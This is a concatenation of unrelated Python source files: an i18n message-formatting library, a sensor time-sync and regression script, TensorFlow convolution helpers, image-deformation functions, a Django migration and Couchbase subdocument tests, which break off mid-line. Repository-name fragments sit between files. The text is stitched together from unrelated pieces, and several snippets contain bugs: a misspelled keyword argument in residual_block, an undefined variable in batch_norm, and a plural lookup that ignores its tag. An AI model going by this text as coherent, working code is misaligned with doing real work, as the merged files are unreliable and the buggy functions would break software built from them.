The locale is irrelevant.''' return isinstance(other, I18NMessage) and self.key == other.key and self.args == other.args and self.kwargs == other.kwargs def with_locale(self, locale): '''Create a new I18N message with a different locale. Use this to specify preferred locales for messages. A typical use case is when you need to display a message in two languages on the same screen, like language selectors which often display "German - Deutsch" or vocabulary learning.''' return I18NMessage(self.key, locale, *self.args, **self.kwargs) # Module names: file name of the module (with path) i18nKnownModules = {} def registerModuleForAutoConfig(func): '''Collect all modules which have I18N methods and functions in a single place. The list of modules can later be used to discover text files which contain messages. ''' module = inspect.getmodule(func) global i18nKnownModules if not module.__name__ in i18nKnownModules: log.info('Registering new module %s', module.__name__) i18nKnownModules[module.__name__] = inspect.getfile(func) return module def i18n(func): '''Decoration for a function or method which can be used to create I18N messages. If the method returns None, for example when a function only uses pass as body, a default I18N message will be supplied. The key of the message is built from the module + the function name. All the arguments to the function are passed to the I18N message. This way, you can do nothing to get the default behavior. Or you can return your own I18N message. Or you can just check the arguments and return None to still get the default behavior. ''' module = registerModuleForAutoConfig(func) key = '%s.%s' % (module.__name__, func.__name__) def wrapped_func(*args, **kwargs): #print 'wrapped_func',key,args,kwargs callargs = inspect.getcallargs(func, *args, **kwargs) result = func(*args, **kwargs) if result is None: return I18NMessage(key, None, *args, **callargs) return result return wrapped_func class DetailFormatter(object): '''Interface for detail formatters.''' def format(self, inst): return repr(inst) class DetailFormatterFactory(object): '''Interface for a factory of detail formatters.''' def can_handle(self, inst): '''Return True if this factory can create formatters for this object''' return False def create_formatter(self, locale): '''Actually create a formatter for an object. Factories can create new formatters with every call or return the same instance when it's stateless.''' raise NotImplementedError() class StringFormatter(DetailFormatter): def format(self, inst): return inst class StringFormatterFactory(DetailFormatterFactory): '''Formatter for plain strings. This exists because we want error messages for all types that don't have an formatter.''' def __init__(self): self.inst = StringFormatter() def can_handle(self, inst): return isinstance(inst, str) def create_formatter(self, locale): return self.inst class I18nMessageFormatter(DetailFormatter): '''Formatter which turns I18NMessage into strings.''' def __init__(self, ts, locale): self.ts = ts self.locale = locale def format(self, inst): return self.ts.translate(inst, self.locale) class I18nMessageFormatterFactory(object): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, I18NMessage) def create_formatter(self, locale): # Maybe cache formatter per locale? 
return I18nMessageFormatter(self.ts, locale) class ListFormatter(DetailFormatter): def __init__(self, ts, locale, **options): self.ts = ts self.locale = locale self.options = options self.empty_message = I18NMessage('pdark.i18n.list.empty') self.comma_message = I18NMessage('pdark.i18n.list.comma') self.and_message = I18NMessage('pdark.i18n.list.and') self.or_message = I18NMessage('pdark.i18n.list.or') def format(self, inst): if len(inst) == 0: return self.ts.translate(self.empty_message, self.locale) def process(item): options = {} formatter = self.ts.formatter_factory.create_formatter(self.locale, item, options) return formatter.format(item) as_strings = [process(item) for item in inst] if len(inst) == 1: return as_strings[0] tail = as_strings[-1] head = as_strings[0:-1] if len(head) > 1: joiner = self.ts.translate(self.comma_message, self.locale) head = joiner.join(head) else: head = head[0] # TODO "neither...nor" joiner = self.ts.translate(self.get_tail_joiner(), self.locale) return joiner.join((head, tail)) def get_tail_joiner(self): if self.options.get('type') == 'or': return self.or_message return self.and_message class ListFormatterFactory(DetailFormatterFactory): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, (list, tuple)) def create_formatter(self, locale, **options): return ListFormatter(self.ts, locale, **options) class NumberFormatter(DetailFormatter): def __init__(self, ts, locale, plural=None): self.ts = ts self.locale = locale self.plural_message_base = None self.plural_message_base = plural self.int_message = I18NMessage('pdark.i18n.number.int') self.float_message = I18NMessage('pdark.i18n.number.float') def format(self, inst): message = self.int_message if isinstance(inst, int) else self.float_message spec = self.ts.translate(message, self.locale) if self.plural_message_base is None: # Note: There is no simple way to format a number according to a locale without breaking stuff. # Use the formatter from pdark.i18n.babel if you need locale aware formatting of numbers. return spec % inst if inst == 0: text = self.get_plural_message('zero') elif inst == 1: text = self.get_plural_message('one') elif inst == 2: text = self.get_plural_message('two') else: # TODO how to handle "few" and "many"? 
text = self.get_plural_message('other') return '%s %s' % (spec % inst, text) def get_plural_message(self, tag): key = self.plural_message_base + '.one' message = I18NMessage(key) try: return self.ts.translate(message, self.locale) except I18nException: if tag == 'other': raise key = self.plural_message_base + '.other' message = I18NMessage(key) return self.ts.translate(message, self.locale) class NumberFormatterFactory(DetailFormatterFactory): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, (int, float)) def create_formatter(self, locale, **options): return NumberFormatter(self.ts, locale, **options) class DefaultFormatterFactory(object): '''A factory to create formatters for various objects.''' def __init__(self, ts): self.ts = ts self.delegates = [ StringFormatterFactory(), I18nMessageFormatterFactory(ts), ListFormatterFactory(ts), NumberFormatterFactory(ts), ] self.cache = {} def register(self, *delegates): self.delegates.extend(delegates) def create_formatter(self, locale, inst, options): delegate = self.cache.get(type(inst)) if delegate is not None: return delegate.create_formatter(locale, **options) for delegate in self.delegates: if delegate.can_handle(inst): self.cache[type(inst)] = delegate return delegate.create_formatter(locale, **options) raise I18nException('No factory can handle %s %r' % (type(inst), inst,)) class I18nException(Exception): pass class MissingTextStrategy(object): '''Strategy how to handle missing texts.''' pass class LogMissingTextStrategy(MissingTextStrategy): '''Just log missing texts and directly convert the I18N message to string. This strategy is most useful during production when you don't want the application to stop working just because a translation is missing.''' def __init__(self): super(LogMissingTextStrategy, self).__init__() self.log = getLogger(self) def apply(self, i18n_message, locale): self.log.warn('Missing text for %r', i18n_message.key) return text_message_formatter(repr(i18n_message)) class FailOnMissingTextsStrategy(MissingTextStrategy): '''Throw an exception on missing texts. This strategy is most useful during development to catch problems early.''' def __init__(self): super(FailOnMissingTextsStrategy, self).__init__() def apply(self, i18n_message, locale): raise I18nException('Missing text for %r' % i18n_message.key) class MessageProvider(object): '''Get the MessageFormatter instance which knows how to build the text for an I18NMessage. Create a new instance of this type if you have a new source for texts.''' def __init__(self, missing_text_strategy=None): self.log = getLogger(self) self.missing_text_strategy = self.create_missing_text_strategy(missing_text_strategy) def create_missing_text_strategy(self, missing_text_strategy): if missing_text_strategy is None: return FailOnMissingTextsStrategy() return missing_text_strategy def lookup_message(self, i18n_message, locale): '''Return an instance of MessageFormatter.''' return self.missing_text_strategy.apply(i18n_message, locale) class SimpleMessageProvider(MessageProvider): '''Very simple implementation of a message provider which allows to add messages to a pool. 
''' def __init__(self, default_locale, parser, missing_text_strategy=None, locale_fallback_strategy=None): super(SimpleMessageProvider, self).__init__(missing_text_strategy) self.default_locale = default_locale self.parser = parser self.pattern_cache = collections.defaultdict(dict) self.locale_fallback_strategy = self.create_locale_fallback_strategy(locale_fallback_strategy) def create_locale_fallback_strategy(self, locale_fallback_strategy): if locale_fallback_strategy is None: return LocaleFallbackStrategy(self.default_locale) return locale_fallback_strategy def register_message(self, key, locale, pattern): keys = self.pattern_cache[locale] # TODO lazy parsing since we don't need all the messages at once and we probably never need all of them keys[key] = self.parser.parse(pattern) def lookup_message(self, i18n_message, locale): fallback_locales = self.locale_fallback_strategy.apply(locale) key = i18n_message.key self.log.debug('Looking for %r with locales %r', key, fallback_locales) for lc in fallback_locales: formatter = self.lookup_single_locale(key, lc) if formatter is not None: return formatter return self.missing_text_strategy.apply(i18n_message, locale) def lookup_single_locale(self, key, locale): #self.log.debug('lookup_single_locale: Trying %s', locale) keys = self.pattern_cache.get(locale, None) if keys is None: return None formatter = keys.get(key, None) if formatter is not None: self.log.debug('lookup_single_locale: Found key %r for %r', key, locale) return formatter class TranslationService(object): '''This service is the core of the whole system. It connects all the other parts, namely the message provider and the formatter factory.''' def __init__(self, default_locale=None, formatter_factory=None, message_provider=None): self.log = getLogger(self) self.default_locale = self.determine_default_locale(default_locale) self.formatter_factory = self.create_formatter_factory(formatter_factory) self.message_provider = self.create_message_provider(message_provider) def determine_default_locale(self, default_locale): if default_locale is None: return locale.getdefaultlocale()[0] return default_locale def create_formatter_factory(self, formatter_factory): if formatter_factory is None: return DefaultFormatterFactory(self) return formatter_factory def create_message_provider(self, message_provider): if message_provider is None: parser = MessageParser(self) return SimpleMessageProvider(self.default_locale, parser) return message_provider def translate(self, i18n_message, locale=None): '''Translate a I18N message: Get the message itself from the message provider and format it using the arguments.''' try: if locale is None: locale = i18n_message.locale if locale is None: locale = self.default_locale formatter = self.message_provider.lookup_message(i18n_message, locale) if formatter is None: raise I18nException('Missing formatter for %r, locale=%r' % (i18n_message, locale)) args = i18n_message.args kwargs = i18n_message.kwargs try: result = formatter.format(locale, args, kwargs) except Exception as e: raise I18nException('Error formatting with %r, args=%r, kwargs=%r: %s' % (formatter, args, kwargs, e)) from e return result except Exception as e: raise I18nException('Error translating %r, locale=%r: %s' % (i18n_message, locale, e)) from e class LocaleFallbackStrategy(object): '''Determine the order in which locales will be searched. 
This strategy will strip details from the end of the locale: 'de_CH' with a default 'en_US' will search 'de_CH', 'de', 'en_US' and 'en'.''' def __init__(self, default_locale): self.default_locale = default_locale def apply(self, locale): result = [] self.split_locale(result, locale) self.split_locale(result, self.default_locale) return result def split_locale(self, result, locale): while locale is not None: result.append(locale) pos = locale.rfind('_') if pos < 0: break locale = locale[:pos] class Fragment(object): pass class TextFragment(Fragment): '''A plain text fragment of a message.''' def __init__(self, text): self.text = text def append_to(self, buffer, locale, args, kwargs): buffer.write(self.text) def __repr__(self): return 'text(%r)' % self.text class ArgumentFragment(Fragment): '''A fragment which references a parameter of the I18N message.''' def __init__(self, ts, ref, options): self.ts, self.ref, self.options = ts, ref, options def append_to(self, buffer, locale, args, kwargs): value = self.ref.get(args, kwargs) #print('ref=%r value=%r' % (self.ref, value)) formatter = self.ts.formatter_factory.create_formatter(locale, value, self.options) #print('formatter=%r' % formatter) text = formatter.format(value) buffer.write(text) def __repr__(self): if len(self.options) == 0: return 'arg(%r)' % (self.ref,) return 'arg(%r, %r)' % (self.ref, self.options) class IndexRef(object): '''Access a parameter by index (0, 1, ... n)''' def __init__(self, index): self.index = index def get(self, args, kwargs): return args[self.index] def __repr__(self): return '[%d]' % self.index class NameRef(object): '''Access a parameter by name. This is the preferred way since - it prevents problems when parameters are added or removed - it makes it easier to spot mistakes - people can still have an idea what the parameter means when they translate messages - it's not that much slower ''' def __init__(self, name): self.name = name def get(self, args, kwargs): return kwargs[self.name] def __repr__(self): return '[%r]' % self.name class MessageFormatter(object): '''Efficiently collect all fragments into a single string.''' def __init__(self, fragments): self.fragments = tuple(fragments) def format(self, locale, args, kwargs): buffer = StringIO() for fragment in self.fragments: fragment.append_to(buffer, locale, args, kwargs) return buffer.getvalue() def __repr__(self): return 'MessageFormatter%r' % (self.fragments,) def text_message_formatter(text): '''Convenience function to turn a string into a message.''' return MessageFormatter(TextFragment(text)) class MessageParser(object): '''Parse a pattern into a MessageFormatter. See the method parse() for examples.''' def __init__(self, ts): self.ts = ts def parse(self, message): '''Parse a message. Valid messages are: - strings - lists - tuples When the argument is a list or tuple, then those can contain - strings - dictionaries Strings will be passed verbatim to the output. Dictionaries describe which argument of the I18N method should be formatted and written to the output. The name (string) or index (int) of the argument is passed as value of the key "arg". All other key-value pairs in the dictionary are passed to the detail formatter for this argument type. 
Examples: > 'text' > ['text'] > ['Hello, ', {'arg': 'name'}] > ['Today is ', {'arg': 'date', 'style': 'long'}] ''' if isinstance(message, str): return MessageFormatter([TextFragment(message)]) fragments = [] try: self.parse0(fragments, message) except Exception as e: raise I18nException('Error parsing %r' % (message,)) from e return MessageFormatter(fragments) def parse0(self, fragments, message): for part in message: if isinstance(part, str): fragments.append(TextFragment(part)) elif isinstance(part, dict): arg = part['arg'] options = dict(part) del options['arg'] if isinstance(arg, int): ref = IndexRef(arg) else: ref = NameRef(arg) fragments.append(ArgumentFragment(self.ts, ref, options)) else: raise I18nException('Unsupported part: %r' % part) import os import numpy as np import matplotlib.pyplot as plt from sklearn import linear_model as lm #function: 時刻同期用関数 #objctive: 線形補間により配列Aの時刻に配列Bの時刻を合わせる #input: 配列A, 配列Bの順.いずれも最初の列が時刻. #outpt: 戻り値は同期後のa,bのデータ def sync(data_a, data_b): cj=1 nrow = data_a.shape[0] ncol = (data_b.shape[1]-1) data_a_sync = data_a[0:,1:] #配列を確保 data_b_sync = np.zeros((nrow, ncol)) for i, a in enumerate(data_a): for j in range(cj, data_b.shape[0]): if a[0]<=data_b[j,0]: #線形補間 t1 = (data_b[j,0] - a[0]) / (data_b[j,0] - data_b[j-1,0]) t2 = (a[0] - data_b[j-1,0]) / (data_b[j,0] - data_b[j-1,0]) data_b_sync[i,] = data_b[j-1,1:] * t1 + data_b[j,1:] * t2 cj = j break return data_a_sync, data_b_sync #function: プロット保存関数 #objctive: xとyの関係を重ねて描画した結果を保存する #input: 1次元x,多次元y,yの次元,xラベル,yラベル,x上下限度,y上下限度,ファイル名 #outpt: なし def savefig(x, ys, dim, xlabel, ylabel, xlim, ylim, filename): fig = plt.figure() ax = fig.add_subplot(1, 1, 1) cm = plt.get_cmap('jet',dim) if dim>1 : for i in range(0,dim): ax.plot(x, ys[0:,i], linestyle='-', color=cm(i), label='chn '+str(i)) else: ax.plot(x, ys, linestyle='-', color=cm(0)) plt.xlim(xlim) ax.set_xlabel(xlabel) plt.ylim(ylim) ax.set_ylabel(ylabel) if dim>1: ax.legend(loc='best') plt.savefig(filename) #function: メイン関数 #objective: 多入力1出力の線形回帰を行う def main(): #データの読み込み data_in = np.loadtxt('data/sample_in.csv', delimiter=',') data_out = np.loadtxt('data/sample_out.csv', delimiter=',') #時系列のデータを保存 tlim = [0,1] #時刻の上下限 input_ylim = [0,1] #inputの上下限 output_ylim = [0,3] #outputの上下限 savefig(data_in[0:,0],data_in[0:,1:],data_in.shape[1]-1,'Time [s]', 'Voltage [V]', tlim, input_ylim, 'data/time-input.png') savefig(data_out[0:,0],data_out[0:,1],1,'Time [s]', 'Displacement [mm]', tlim, output_ylim, 'data/time-out.png') #データの時刻を揃える data_in_sync,data_out_sync = sync(data_in, data_out) np.savetxt('data/sample_in_sync.csv', data_in_sync, delimiter=',') np.savetxt('data/sample_out_sync.csv', data_out_sync, delimiter=',') #各チャンネルの入力と出力関係をプロット for i in range(0,data_in_sync.shape[1]): savefig(data_in_sync[0:,i],data_out_sync[0:,0],1,'Voltage [V]', 'Displacement [mm]', input_ylim, output_ylim, 'data/input'+str(i)+'-output.png') #重回帰分析 clf = lm.LinearRegression() X = data_in_sync Y = data_out_sync[0:,0] clf.fit(X, Y) Y_est = clf.predict(X) Y_bind =np.column_stack([Y,Y_est]) RMSE = np.sqrt(np.dot((Y_est-Y),(Y_est-Y))/Y.shape[0]) #結果の値を表示・推定結果のグラフを保存 print('W=') print(clf.coef_) print('b=') print(clf.intercept_) print('R^2=') print(clf.score(X, Y)) print('RMSE=') print(RMSE) print('NRMSE=') print(RMSE/max(abs(Y))) savefig(data_in[0:,0],Y_bind,2,'Time [s]', 'Displacement [mm]', tlim, output_ylim, 'data/time-result.png') if __name__ == '__main__': main()RunOrVeith/SyNEThesia import tensorflow as tf from tensorflow.python.ops.random_ops import truncated_normal import numpy as 
np def batch_norm(x, is_train_tensor=None): if is_train_tensor is None: is_training_tensor = tf.get_default_graph().get_tensor_by_name('is_training:0') normed, _, _ = tf.nn.fused_batch_norm(x, scale=tf.ones(shape=(x.get_shape()[-1],)), offset=tf.zeros(shape=(x.get_shape()[-1],)), is_training=is_train_tensor, name=None) return normed def conv2d(x, output_channels, scope=None, kernel=(5, 5), stride=1, use_batchnorm=False, activation=None,): strides = [1, stride, stride, 1] in_dim = x.get_shape().as_list()[-1] with tf.variable_scope(scope or "conv2"): if use_batchnorm: x = batch_norm(x) if activation is not None: x = activation(x) initializer = tf.contrib.layers.xavier_initializer(uniform=True, seed=None, dtype=tf.float32) W = tf.get_variable(name="weight", shape=[*kernel, in_dim, output_channels], dtype=tf.float32, initializer=initializer, trainable=True) b = tf.get_variable(name="bias", shape=[output_channels], dtype=tf.float32, initializer=tf.constant_initializer(0.), trainable=True) x = tf.nn.conv2d(input=x, filter=W, strides=strides, padding='SAME', use_cudnn_on_gpu=True, data_format='NHWC') x = tf.add(x, b) return x def conv2d_transposed(x, output_channels, scope=None, kernel=(4, 4), stride=2, use_batchnorm=False, activation=None): assert isinstance(output_channels, int) assert isinstance(stride, int) channels = max(output_channels, 2) strides = [1, stride, stride, 1] input_channels = x.get_shape()[-1].value with tf.variable_scope(scope or "conv2d_transposed"): if use_batchnorm: x = batch_norm(x) if activation is not None: x = activation(x) input_shape = tf.shape(x) h = input_shape[1] * stride w = input_shape[2] * stride output_shape = tf.stack([input_shape[0], h, w, channels]) bilinear_initializer = bilinear_weight_initializer(filter_size=kernel) W = tf.get_variable(name="weight", shape=[*kernel, channels, input_channels], dtype=tf.float32, initializer=bilinear_initializer, trainable=True) b = tf.get_variable(name="bias", shape=[output_channels], dtype=tf.float32, initializer=tf.constant_initializer(0.), trainable=True) x = tf.nn.conv2d_transpose(value=x, filter=W, output_shape=output_shape, strides=strides, padding='SAME', data_format='NHWC', name="conv2d_transposed") return tf.add(x, b) def bilinear_weight_initializer(filter_size, add_noise=True): def _initializer(shape, dtype=tf.float32, partition_info=None): if shape: # second last dimension is input, last dimension is output fan_in = float(shape[-2]) if len(shape) > 1 else float(shape[-1]) fan_out = float(shape[-1]) else: fan_in = 1.0 fan_out = 1.0 # define weight matrix (set dtype always to float32) weights = np.zeros((filter_size[0], filter_size[1], int(fan_in), int(fan_out)), dtype=dtype.as_numpy_dtype()) # get bilinear kernel bilinear = bilinear_filt(filter_size=filter_size) bilinear = bilinear / fan_out # normalize by number of channels # set filter in weight matrix (also allow channel mixing) for i in range(weights.shape[2]): for j in range(weights.shape[3]): weights[:, :, i, j] = bilinear # add small noise for symmetry breaking if add_noise: # define standard deviation so that it is equal to 1/2 of the smallest weight entry std = np.min(bilinear) / 2 noise = truncated_normal(shape=shape, mean=0.0, stddev=std, seed=None, dtype=dtype) weights += noise return weights return _initializer def bilinear_filt(filter_size=(4, 4)): assert isinstance(filter_size, (list, tuple)) and len(filter_size) == 2 factor = [(size + 1) // 2 for size in filter_size] if filter_size[0] % 2 == 1: center_x = factor[0] - 1 else: center_x = factor[0] - 
0.5 if filter_size[1] % 2 == 1: center_y = factor[1] - 1 else: center_y = factor[1] - 0.5 og = np.ogrid[:filter_size[0], :filter_size[1]] kernel = (1 - abs(og[0] - center_x) / factor[0]) * (1 - abs(og[1] - center_y) / factor[1]) return kernel def residual_block(x, output_channels, scope=None, use_batchnorm=False, activation=None): with tf.variable_scope(scope or "residual_block"): shortcut = x input_channels = x.get_shape()[-1] x = conv2d(x=x, output_channels=output_channels, scope='conv_1', kernel=(3, 3), stride=1, use_batchnorm=use_batchnorm, activation=activation) x = conv2d(x=x, output_channels=output_channels, scope='conv_2', kernel=(3, 3), stride=1, use_batchnorm=use_batchnorm, activation=activation) if input_channels != output_channels: shortcut = conv2d(x=shortcut, output_channel=output_channels, scope='conv_1x1', use_batchnorm=False, kernel=(1, 1), stride=1, activation=None) return tf.add(shortcut, x) 100-1000 import numpy as np import os from PIL import Image def repeat_channel(img): new_shape = list(img.shape) + [3] img = np.repeat(img, 3).reshape(new_shape) return img def get_new_idx(x, lam=1.0, a=0., b=0.5): g = (2 * b - 2 * a) * x + 2 * a f = x + 0.5 * lam * x * (np.sin(g) - np.sin(2 * b)) return f def dfx(x, lam, a, b): g = (2 * b - 2 * a) * x + 2 * a df = 1 + 0.5 * lam * (np.sin(g) - np.sin(2 * b)) + lam * x * (b - a) * np.cos(g) return df def check_param(lam, a, b): xs = np.linspace(0., 1., 100) df = dfx(xs, lam, a, b) if np.min(df) < 0: print('The param is Not valid, df_min={:.4f}, please check.'.format(np.min(df))) return False print('The param is Valid!') return True def deform_x(img_arr, lam, a, b): height, width = img_arr.shape idxs = np.arange(width) / float(width - 1) new_idxs = get_new_idx(idxs, lam, a, b) new_idxs = np.floor(new_idxs * (width - 1)).astype(int) lost_idxs = sorted(set(list(range(width))) - set(new_idxs)) new_img = np.zeros_like(img_arr, dtype=np.uint8) for i, new_idx in enumerate(new_idxs): new_img[:, new_idx] |= img_arr[:, i] for lost_idx in lost_idxs: new_img[:, lost_idx] |= new_img[:, lost_idx - 1] return new_img def deform_y(img_arr, lam, a, b): height, width = img_arr.shape idxs = np.arange(height) / float(height - 1) new_idxs = get_new_idx(idxs, lam, a, b) new_idxs = np.floor(new_idxs * (height - 1)).astype(int) lost_idxs = sorted(set(list(range(height))) - set(new_idxs)) new_img = np.zeros_like(img_arr, dtype=np.uint8) for i, new_idx in enumerate(new_idxs): new_img[new_idx] |= img_arr[i] for lost_idx in lost_idxs: new_img[lost_idx] |= new_img[lost_idx - 1] return new_img def deform_xy(img_arr, lam1, a1, b1, lam2, a2, b2): if len(img_arr.shape) == 3: img_arr = img_arr[:, :, 0] if a1 != b1: img_arr = deform_x(img_arr, lam1, a1, b1) if a2 != b2: img_arr = deform_y(img_arr, lam2, a2, b2) img_arr = repeat_channel(img_arr) return img_arr def erase(image, part): assert(image.shape[0] % 2 ==0 and image.shape[1] % 2 ==0) if part == 0: zero_part = np.zeros([image.shape[0] // 2, image.shape[1], image.shape[2]], dtype=np.uint8) return np.concatenate((image[0 : image.shape[0] // 2, :], zero_part), axis = 0) if part == 1: zero_part = np.zeros([image.shape[0], image.shape[1] // 2, image.shape[2]], dtype=np.uint8) return np.concatenate((zero_part, image[:, image.shape[1] // 2 : ]), axis = 1) if part == 2: zero_part = np.zeros([image.shape[0] // 2, image.shape[1], image.shape[2]], dtype=np.uint8) return np.concatenate((zero_part, image[image.shape[0] // 2 : , : ]), axis = 0) if part == 3: zero_part = np.zeros([image.shape[0], image.shape[1] // 2, 
image.shape[2]], dtype=np.uint8) return np.concatenate((image[ : , 0 : image.shape[1] // 2], zero_part), axis = 1)djordjetrajkovic/presqt1-10 def calculate_job_percentage(total_files, files_finished): """ Do some maths to calculate the job percentage :) Parameters ---------- total_files: int Total number of files for a job files_finished: int Files finished for a job Returns ------- An int representation of the job percentage """ job_percentage = 0 if total_files != 0 and files_finished != 0: job_percentage = round(files_finished / total_files * 100) # Little bit of a hack here, the front end doesn't build resources as fast as they are # returned so to get around the FE hanging on 100% for a few seconds, we'll display 99. if job_percentage == 100: job_percentage = 99 return job_percentage# Generated by Django 3.0.6 on 2020-05-15 17:57 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Research', fields=[ ('timestamp', models.DateTimeField(auto_now_add=True)), ('uuid_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), ('content', models.TextField(max_length=280)), ('reply', models.BooleanField(default=False, verbose_name='Is a reply?')), ('meta_url', models.CharField(max_length=2048, null=True)), ('meta_type', models.CharField(max_length=255, null=True)), ('meta_title', models.CharField(max_length=255, null=True)), ('meta_description', models.TextField(max_length=255, null=True)), ('meta_image', models.CharField(max_length=255, null=True)), ('liked', models.ManyToManyField(blank=True, related_name='liked_research', to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='thread', to='research.Research')), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='publisher2', to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name': 'Research', 'verbose_name_plural': 'Research', 'ordering': ('-timestamp',), }, ), ] sumedhpb/testrunner import logger import unittest from membase.helper.rebalance_helper import RebalanceHelper from couchbase_helper.cluster import Cluster from basetestcase import BaseTestCase from remote.remote_util import RemoteMachineShellConnection from membase.helper.subdoc_helper import SubdocHelper from random import randint class SubdocSanityTests(unittest.TestCase): def setUp(self): self.log = logger.Logger.get_logger() self.helper = SubdocHelper(self, "default") self.helper.setup_cluster() self.cluster = Cluster() self.servers = self.helper.servers def tearDown(self): self.helper.cleanup_cluster() def test_simple_dataset_sanity(self): self.test_simple_dataset_get() self.test_deep_nested_dataset_get_dict() self.test_deep_nested_dataset_get_array() self.test_simple_dataset_dict_upsert() self.test_simple_dataset_dict_add() self.test_simple_dataset_remove() self.test_simple_dataset_exists() self.test_simple_dataset_replace() self.test_simple_dataset_array_push_last() self.test_simple_dataset_array_push_first() self.test_simple_dataset_counter() self.test_simple_dataset_array_add_unique() self.test_simple_dataset_counter() def test_simple_dataset_get(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple get sub doc single path 
" "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() data_set.get_all_docs(inserted_keys, path = 'isDict') data_set.get_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.get_all_docs(inserted_keys, path='dict_value.name') data_set.get_all_docs(inserted_keys, path='array[0]') data_set.get_all_docs(inserted_keys, path='array[-1]') ''' This should go into ErrorTesting ''' #self.assertFalse(data_set.get_all_docs(inserted_keys, path='array[-5]')) #self.assertFalse(data_set.get_all_docs(inserted_keys, path=' ')) def test_deep_nested_dataset_get_dict(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue get sub doc on deep nested single path on dictionaries " "dataset with {0} docs".format(num_docs)) data_set = DeeplyNestedDataSet(self.helper, num_docs) inserted_keys, levels = data_set.load() '''Top level element''' #data_set.get_all_docs(inserted_keys, path = 'number', check_data=levels) data_set.get_all_docs(inserted_keys, path = 'array') data_set.get_all_docs(inserted_keys, path = 'array[0]') '''Last element Dictionary''' self.log.info('Testing last element dictionary') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels-1)) '''Last element Dict.Array''' self.log.info('Testing Dict.Array') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels-2)+'.array[0]') '''Intermediate element Dict.Array''' self.log.info('Testing Intermediate element Dict. Array') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels//2)+'.array[0]') def test_deep_nested_dataset_get_array(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue get sub doc on deep nested single path on dictionaries " "dataset with {0} docs".format(num_docs)) data_set = DeeplyNestedDataSet(self.helper, num_docs) inserted_keys, levels = data_set.load() '''Top level element''' data_set.get_all_docs(inserted_keys, path = 'number') data_set.get_all_docs(inserted_keys, path = 'array') data_set.get_all_docs(inserted_keys, path = 'array[0]') '''Last element Array''' last_path ='child' for i in range(levels-1): last_path +='.child' data_set.get_all_docs(inserted_keys, path = last_path) '''Last element Array of Array''' last_path ='child' for i in range(levels-3): last_path +='.child' last_path +='.array[-1][-1][-1]' data_set.get_all_docs(inserted_keys, path = last_path) '''Intermediate element Array''' last_path ='child' for i in range(levels//2): last_path +='.child' last_path +='.array[0][-1]' data_set.get_all_docs(inserted_keys, path = last_path) def test_simple_dataset_dict_upsert(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple upsert dict sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(1000) data_set.upsert_all_docs(inserted_keys, replace_string, path='isDict') data_set.upsert_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.upsert_all_docs(inserted_keys, replace_string, path='dict_value.name') data_set.upsert_all_docs(inserted_keys, "999", path='height') data_set.upsert_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_dict_add(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : 
Issue simple add dict sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(1000) #data_set.add_all_docs(inserted_keys, replace_string, path='isDict') #data_set.add_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.add_all_docs(inserted_keys, replace_string, path='dict_value') #data_set.add_all_docs(inserted_keys, "999", path='height') #data_set.add_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_remove(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple remove sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() data_set.remove_all_docs(inserted_keys, path='isDict') data_set.remove_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.remove_all_docs(inserted_keys, path='dict_value.name') data_set.remove_all_docs(inserted_keys, path='array[0]') data_set.remove_all_docs(inserted_keys, path='array[-1]') def test_simple_dataset_exists(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple exists sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' add test code to accept Bool values and not error out ''' data_set.exists_all_docs(inserted_keys, path='isDict') data_set.exists_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.exists_all_docs(inserted_keys, path='dict_value.name') data_set.exists_all_docs(inserted_keys, path='array[0]') data_set.exists_all_docs(inserted_keys, path='array[-1]') def test_simple_dataset_replace(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple replace sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) data_set.replace_all_docs(inserted_keys, replace_string, path='isDict') data_set.replace_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.replace_all_docs(inserted_keys, replace_string, path='dict_value.name') data_set.replace_all_docs(inserted_keys, "999", path='height') data_set.replace_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_array_push_last(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple array_push_last sub doc single path " "dataset with 